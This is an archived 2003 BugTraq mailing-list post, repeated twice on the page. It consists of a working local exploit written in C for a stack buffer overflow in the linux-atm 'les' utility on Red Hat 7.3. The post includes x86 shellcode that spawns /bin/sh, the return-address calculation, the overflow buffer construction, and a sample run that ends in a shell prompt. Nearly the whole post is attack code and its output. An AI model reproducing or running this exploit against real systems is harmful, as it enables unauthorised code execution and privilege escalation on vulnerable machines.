BugTraq
Back to list
|
Post reply
ATM on linux Exploit(les,local)
May 25 2003 05:19AM
axis ph4nt0m (axis ph4nt0m net)
/* ATM on linux Exploit
*** vulnerability discovered by Angelo Rosiello
*** sorry for my poor english.
*** i wrote this exploit just for fun.
*** i can't get a rootshell on my linux :(
*** tested on redhat7.3 ,other linux maybe OK,too.
*** atm package:linux-atm-2.4.0-1.i386.rpm
*** http://sourceforge.net/projects/linux-atm
***
*** Here is another exploit by Angelo Rosiello
*** But i can't get shell with this code
*** http://www.securiteam.com/exploits/5EP0M1P9PO.html
***************************************************
Buffer is 244 bytes
using 244+4 bytes to overwrite eip.
***************************************************
*** AUTOR:@Xis2(ph4nt0m)
*** CONTACT:axis (at) ph4nt0m (dot) net [email concealed]
*** COPYRIGHT (c) 2003 PH4NT0M SECURITY
*** http://www.ph4nt0m.net
*** 2003.5.15
***************************************************
[tt@PH4NT0M explab]$ gcc -o linux_atm myatm.c
[tt@PH4NT0M explab]$ ./linux_atm
****************************************
linux-atm exploit!
Coded by @Xis2(ph4nt0m)
Welcome to http://www.ph4nt0m.net
Jump to 0xbffffa5c
****************************************
DEBUG: Log opened
NOTE: Configuration file:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAA
AAAAAAAAAAAAAAAAAAAAAAA??
sh-2.05a$
***************************************************
*/
#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>
#define BSIZE 244
/* linux x86 shellcode by bob from dtors.net,23 bytes */
char shellcode[]="\x31\xc0\x50\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x89\xe3\x50"
"\x53\x89\xe1\xb0\x0b\xcd\x80";
int main(int argc,char *argv[]){
char buf[BSIZE+10];
char *prog[]={"/usr/local/sbin/les","-f",buf,NULL};
char *env[]={"HOME=/root",shellcode,NULL};
unsigned long ret;
printf("****************************************\n\n");
printf("Linux-atm exploit!\n\n");
printf("Coded by @Xis2(ph4nt0m)\n");
printf("Welcome to http://www.ph4nt0m.net\n\n");
printf("Jump to 0x%08x\n",&ret);
printf("****************************************\n\n\n");
/* calculate the shellcode address */
ret=0xc0000000-sizeof(void *)-strlen(prog[0])-strlen(shellcode)-0x02;
/* construct our evil buffer */
memset(buf,0x41,sizeof(buf));
memcpy(buf+BSIZE+4,(char *)&ret,4);
buf[BSIZE+8]=0x00;
execve(prog[0],prog,env);
return 0;
}
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
/* ATM on linux Exploit
*** vulnerability discovered by Angelo Rosiello
*** sorry for my poor english.
*** i wrote this exploit just for fun.
*** i can't get a rootshell on my linux :(
*** tested on redhat7.3 ,other linux maybe OK,too.
*** atm package:linux-atm-2.4.0-1.i386.rpm
*** http://sourceforge.net/projects/linux-atm
***
*** Here is another exploit by Angelo Rosiello
*** But i can't get shell with this code
*** http://www.securiteam.com/exploits/5EP0M1P9PO.html
***************************************************
Buffer is 244 bytes
using 244+4 bytes to overwrite eip.
***************************************************
*** AUTOR:@Xis2(ph4nt0m)
*** CONTACT:axis (at) ph4nt0m (dot) net [email concealed]
*** COPYRIGHT (c) 2003 PH4NT0M SECURITY
*** http://www.ph4nt0m.net
*** 2003.5.15
***************************************************
[tt@PH4NT0M explab]$ gcc -o linux_atm myatm.c
[tt@PH4NT0M explab]$ ./linux_atm
****************************************
linux-atm exploit!
Coded by @Xis2(ph4nt0m)
Welcome to http://www.ph4nt0m.net
Jump to 0xbffffa5c
****************************************
DEBUG: Log opened
NOTE: Configuration file:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAA
AAAAAAAAAAAAAAAAAAAAAAA??
sh-2.05a$
***************************************************
*/
#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>
#define BSIZE 244
/* linux x86 shellcode by bob from dtors.net,23 bytes */
char shellcode[]="\x31\xc0\x50\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x89\xe3\x50"
"\x53\x89\xe1\xb0\x0b\xcd\x80";
int main(int argc,char *argv[]){
char buf[BSIZE+10];
char *prog[]={"/usr/local/sbin/les","-f",buf,NULL};
char *env[]={"HOME=/root",shellcode,NULL};
unsigned long ret;
printf("****************************************\n\n");
printf("Linux-atm exploit!\n\n");
printf("Coded by @Xis2(ph4nt0m)\n");
printf("Welcome to http://www.ph4nt0m.net\n\n");
printf("Jump to 0x%08x\n",&ret);
printf("****************************************\n\n\n");
/* calculate the shellcode address */
ret=0xc0000000-sizeof(void *)-strlen(prog[0])-strlen(shellcode)-0x02;
/* construct our evil buffer */
memset(buf,0x41,sizeof(buf));
memcpy(buf+BSIZE+4,(char *)&ret,4);
buf[BSIZE+8]=0x00;
execve(prog[0],prog,env);
return 0;
}
[ reply ]